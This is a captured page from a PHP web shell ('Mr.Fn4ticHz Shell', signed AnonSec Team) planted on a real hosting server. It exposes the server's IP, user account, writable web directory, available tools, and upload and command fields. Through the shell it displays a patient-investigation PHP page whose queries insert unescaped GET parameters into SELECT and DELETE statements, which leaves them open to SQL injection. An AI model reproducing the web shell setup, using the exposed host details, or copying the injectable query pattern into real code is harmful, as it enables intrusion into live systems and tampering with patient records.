Mr.Fn4ticHz Shell
Server IP : 162.240.98.243  /  Your IP : 3.133.107.25
Web Server : Apache
System : Linux server.bti.yaw.mybluehostin.me 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : btiyawmy ( 1003)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/btiyawmy/public_html/login.easenup.in/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ HOME ]     

Current File : /home/btiyawmy/public_html/login.easenup.in/edit_showpage_investigation.php
     <?php
     session_start();
require_once('../DBManager.php');
require_once('../LoginManager.php');
include 'dashboarddocument.php';
include 'header.php';
include 'dbconnection.php';
?>
	  
	  <?php
include("dbconnection.php");
if(isset($_GET[delid]))
{
	$sql ="DELETE FROM investigation WHERE id='$_GET[delid]'";
	$qsql=mysqli_query($con,$sql);
	if(mysqli_affected_rows($con) == 1)
	{
	    	$sql ="DELETE FROM patient_invace WHERE invaceid='$_GET[delid]'";
	$qsql=mysqli_query($con,$sql);
	if(mysqli_affected_rows($con) == 1)
		echo "<script>alert('Deleted successfully..');</script>";
	}
}
?>

   <div class="content-wrapper">
    <!-- Content Header (Page header) -->
    <section class="content-header">


<h2 align="center">Investigation</h2>





<table id="example2"  id ="demo" class="table table-bordered table-hover">
                  <thead>
                  <tr>
         <th><strong>Date Time</strong></th>
         <th><strong>Investigation</strong></th>
          <th><strong>Action</strong></th> 
                                </tr>
                  </thead>
                  
               
  <?php
   include("dbconnection.php");
			$sql ="SELECT * FROM investigation WHERE prescriptionid='$_GET[prescriptionid]' AND patientid='$_GET[patientid]'";
		$qsql = mysqli_query($con,$sql);
		while($rs = mysqli_fetch_array($qsql))
		{
            echo " <tbody>
                                                                                                                                                                
     <tr>   <td>&nbsp;$rs[created_at]</td>     
            <td>&nbsp;";
	   if (is_numeric($rs[Category]))
{
$sql1 ="SELECT * FROM labdepartment WHERE labdepartmentid='$rs[Category]'";
		$qsql1 = mysqli_query($con,$sql1);
	while($rh1 = mysqli_fetch_array($qsql1))
echo "$rh1[lab_department_name]";
}
   if (is_numeric($rs[Sub_Category]))
{
$sql1 ="SELECT * FROM radiobodypart WHERE radiobodypartid='$rs[Sub_Category]'";
		$qsql1 = mysqli_query($con,$sql1);
	while($rh1 = mysqli_fetch_array($qsql1))
echo "-  &nbsp; $rh1[bodypart]";
}
   if (is_numeric($rs[Sub_Category]))
{
$sql1 ="SELECT * FROM list_Investigation WHERE ivid='$rs[Investigation]'";
		$qsql1 = mysqli_query($con,$sql1);
	while($rh1 = mysqli_fetch_array($qsql1))
echo "-  &nbsp; $rh1[Investigation]";
}
            $sqlpatient1 = "SELECT * FROM list_Investigation WHERE ivid='$rs[ivid]'";
	$qsqlpatient1 = mysqli_query($con,$sqlpatient1);
	while($rsn = mysqli_fetch_array($qsqlpatient1))
	{
	    echo"
	    $rsn[Investigation]"; }
	    echo"</b></td>
        
		 <td><a href='edit_showpage_investigation.php?prescriptionid=$rs[prescriptionid]&patientid=$rs[patientid]&delid=$rs[id]'>Delete</a></td>

	
          </tr>                   
          
     ";
}
?>  
   </tbody>
</table>

Anon7 - 2022
AnonSec Team